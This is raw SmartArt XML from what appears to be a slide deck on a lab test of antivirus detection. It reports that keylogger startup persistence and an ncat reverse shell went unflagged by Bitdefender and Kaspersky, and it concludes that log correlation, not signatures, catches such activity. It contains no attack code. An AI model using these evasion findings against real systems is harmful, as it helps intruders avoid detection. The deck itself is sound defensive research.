    <dgm:cxn modelId="{52E8C3A5-B6AB-48D9-86A8-9330CE5E2819}" type="presParOf" srcId="{7D73C057-77B7-4D5F-9808-6A8C13EDB643}" destId="{51A35B2C-D0B9-41BB-A545-0D2C7EB70267}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6106B242-783E-482D-A6C7-601E9C9804A1}" type="presParOf" srcId="{7D73C057-77B7-4D5F-9808-6A8C13EDB643}" destId="{252BCE06-0926-4D6C-9114-08772B617AD5}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{52F962B7-B608-4F9C-BFD9-562D4CD5FF4A}" type="presParOf" srcId="{7D73C057-77B7-4D5F-9808-6A8C13EDB643}" destId="{F3D92D88-9CD2-46B8-8DDF-76F5104838EA}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{FCB8038D-F0B1-41BC-85C1-BB7140F29BAE}" type="presParOf" srcId="{7D73C057-77B7-4D5F-9808-6A8C13EDB643}" destId="{D000E085-3547-4EC6-9CC4-84B22E2A94C9}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{02EC17CB-7E38-4122-87C0-C7E923BA2EA2}" type="presParOf" srcId="{D000E085-3547-4EC6-9CC4-84B22E2A94C9}" destId="{09F991DB-6DEF-4BD5-B26B-CC0904B770A1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{23D98006-1585-489A-B846-BD41D97E5265}" type="presParOf" srcId="{D000E085-3547-4EC6-9CC4-84B22E2A94C9}" destId="{953F92B8-4E50-477C-BD43-BA7C150110A5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4EEB0800-7565-4124-8BFD-8E53BB1F4D38}" type="presParOf" srcId="{7D73C057-77B7-4D5F-9808-6A8C13EDB643}" destId="{36A77755-DE90-4BE1-B79F-45FDF6D7A0C9}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{50CA614C-49F4-40D4-AC5A-01BE7931D713}" type="presParOf" srcId="{7D73C057-77B7-4D5F-9808-6A8C13EDB643}" destId="{FE0723A4-A68F-4E35-9E13-C6F74ED92A2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2C2E1-E5B1-47D3-BB5E-CF2625F675AF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="682"/>
          <a:ext cx="6245265" cy="57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4BC85-008C-4416-96A5-C3107F5360A7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="173370" y="129635"/>
          <a:ext cx="315219" cy="3152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7B09E-EEA2-4F45-ABD8-D2CF985D577C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="661960" y="682"/>
          <a:ext cx="5583304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solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Introduction</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1600" b="1" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="661960" y="682"/>
        <a:ext cx="5583304" cy="573126"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{10F75C7F-AD7E-49F5-BB32-7F1D962152D0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="717090"/>
          <a:ext cx="6245265" cy="57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4048A-F38B-4884-87D5-3E57DF56F6D6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="173370" y="846043"/>
          <a:ext cx="315219" cy="3152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5FD24-0EA7-4649-BD2C-124ABE1CBB6B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="661960" y="717090"/>
          <a:ext cx="5583304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solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Methodology</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1600" b="0" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="661960" y="717090"/>
        <a:ext cx="5583304" cy="573126"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0AB0DF4A-289A-4C10-827A-0DDBD7B6212B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1433498"/>
          <a:ext cx="6245265" cy="57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61617-BA42-4D7E-8224-7168DCF33A99}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="173370" y="1562451"/>
          <a:ext cx="315219" cy="315219"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="2020599"/>
            <a:satOff val="-7611"/>
            <a:lumOff val="6387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F0B8E-DF56-4C8A-8E62-28FFBE23C13E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="661960" y="1433498"/>
          <a:ext cx="5583304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solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Theoretical</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1600" b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1600" b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Foundations</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1600" b="0" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="661960" y="1433498"/>
        <a:ext cx="5583304" cy="573126"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9B8B9752-E0F7-4BB7-9E3F-8C03374983B9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2149906"/>
          <a:ext cx="6245265" cy="57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5C1F7-EF7F-4A02-B7A4-37956C9FE393}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="173370" y="2278859"/>
          <a:ext cx="315219" cy="315219"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="3030899"/>
            <a:satOff val="-11416"/>
            <a:lumOff val="958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12080-31C0-45F6-B583-B21C85C721F3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="661960" y="2149906"/>
          <a:ext cx="5583304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solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Experimental</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1600" b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1600" b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Steps</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1600" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="661960" y="2149906"/>
        <a:ext cx="5583304" cy="573126"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ABF60EAA-31AA-4240-A0B8-4060F20D71EC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2866314"/>
          <a:ext cx="6245265" cy="57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310BA-731E-4DAB-8922-8A964BDD8C7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="173370" y="2995267"/>
          <a:ext cx="315219" cy="3152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00F0F-B816-47F9-9F38-7E6024298189}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="661960" y="2866314"/>
          <a:ext cx="5583304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solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Experimental Results</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1600" b="0" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="661960" y="2866314"/>
        <a:ext cx="5583304" cy="573126"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3DEE4272-2B2C-4D5C-AD21-9FB8C2201B49}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3582722"/>
          <a:ext cx="6245265" cy="57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0E838-98DA-45C9-AD68-471C6A36C110}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="173370" y="3711675"/>
          <a:ext cx="315219" cy="315219"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="5051498"/>
            <a:satOff val="-19027"/>
            <a:lumOff val="15966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E092D-9121-4F0A-B075-31425980958C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="661960" y="3582722"/>
          <a:ext cx="5583304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solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Discussion</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1600" b="0" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1600" b="0" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="661960" y="3582722"/>
        <a:ext cx="5583304" cy="573126"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{19B96CFD-39C5-4F9A-AD90-23B1BBCE1ED6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4299130"/>
          <a:ext cx="6245265" cy="57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1A9E7-84F1-4D8A-A7F2-ED3C6A3E36C0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="173370" y="4428083"/>
          <a:ext cx="315219" cy="315219"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="6061798"/>
            <a:satOff val="-22833"/>
            <a:lumOff val="1916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BB4A5-E307-4786-BA08-9A867932E4AD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="661960" y="4299130"/>
          <a:ext cx="5583304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solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Conclusion</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1600" b="0" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1600" b="0" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="661960" y="4299130"/>
        <a:ext cx="5583304" cy="573126"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{92F87DDF-0B0E-4375-9761-288D6990C708}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5015538"/>
          <a:ext cx="6245265" cy="57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3E471-0624-453E-B935-BC0F76BF44FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="173370" y="5144491"/>
          <a:ext cx="315219" cy="315219"/>
        </a:xfrm>
        <a:prstGeom prst="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382BC-B5B9-430A-96E9-FD0E60966E80}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="661960" y="5015538"/>
          <a:ext cx="5583304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solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>References</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1600" b="1" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="661960" y="5015538"/>
        <a:ext cx="5583304" cy="5731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69764-FACE-4485-A045-F431674AA07F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="24866"/>
          <a:ext cx="11001454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schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>System Resource </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="2000" kern="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Usage</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="23417" y="48283"/>
        <a:ext cx="10954620" cy="432866"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5B41E3E0-DA76-40EA-ACE9-48C4AA128554}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="504566"/>
          <a:ext cx="11001454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96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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Total</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1600" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> CPU usage stayed below 6% during full attack chain execution.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1600" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Defender + Bitdefender together used ~50 MB RAM and ran quietly in the background.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1600" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Kaspersky consumed the most RAM (~311 MB) but still produced no alerts.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1600" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>No major CPU or memory spikes → stealth operations remained low-noise and difficult to detect based on performance monitoring alone.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1600" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="504566"/>
        <a:ext cx="11001454" cy="1304100"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6BCA9DF8-092A-4FE2-A981-5695330CE23E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1808667"/>
          <a:ext cx="11001454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schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Detection </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="2000" kern="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Observations</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="23417" y="1832084"/>
        <a:ext cx="10954620" cy="432866"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BC4A570A-5188-4F7B-8B2A-3AA076EEF003}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2288367"/>
          <a:ext cx="1100145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96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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Startup</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1600" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> persistence (keylog.py, cmd_commands.bat) was not flagged immediately by any AV.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1600" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Reverse shell (ncat) generated some network visibility but no real-time process block.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1600" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Defender caught partial activity, but only after user manually approved execution.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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Bitdefender &amp; Kaspersky raised no detection alerts at any stage.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1600" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2288367"/>
        <a:ext cx="11001454" cy="1076400"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{673AF65F-26D2-4E86-B034-A65A1E2B3001}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3364767"/>
          <a:ext cx="11001454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schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Key </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="2000" kern="1200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Insight</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="23417" y="3388184"/>
        <a:ext cx="10954620" cy="432866"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7F468A81-C938-44FF-A203-3EF26AD1AB62}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3844467"/>
          <a:ext cx="1100145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96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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Detection</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1600" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> was only effective when network traffic or host telemetry (Sysmon Event ID 1) were </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1600" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>analysed</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1600" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Antivirus agents alone were insufficient — high RAM usage (like Kaspersky’s) did not equal better protection.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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Conclusion: Real detection depends on log correlation, not just AV signatures or resource footprint.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="171450" lvl="1" indent="-171450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600" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3844467"/>
        <a:ext cx="11001454" cy="10764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6F946-0BAB-4BC1-861A-8DDA797E2663}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="412"/>
          <a:ext cx="1036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19B14-C406-4ED7-902C-1A4844A445FD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="412"/>
          <a:ext cx="10363200" cy="67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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Team</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3100" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="412"/>
        <a:ext cx="10363200" cy="676366"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7E7E6BEF-A6A4-4679-8E28-74F46A483F5F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="676779"/>
          <a:ext cx="1036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E879F-B4EA-4049-BCFE-96953C1F536A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="676779"/>
          <a:ext cx="10363200" cy="67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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>• Zinar </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="3100" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
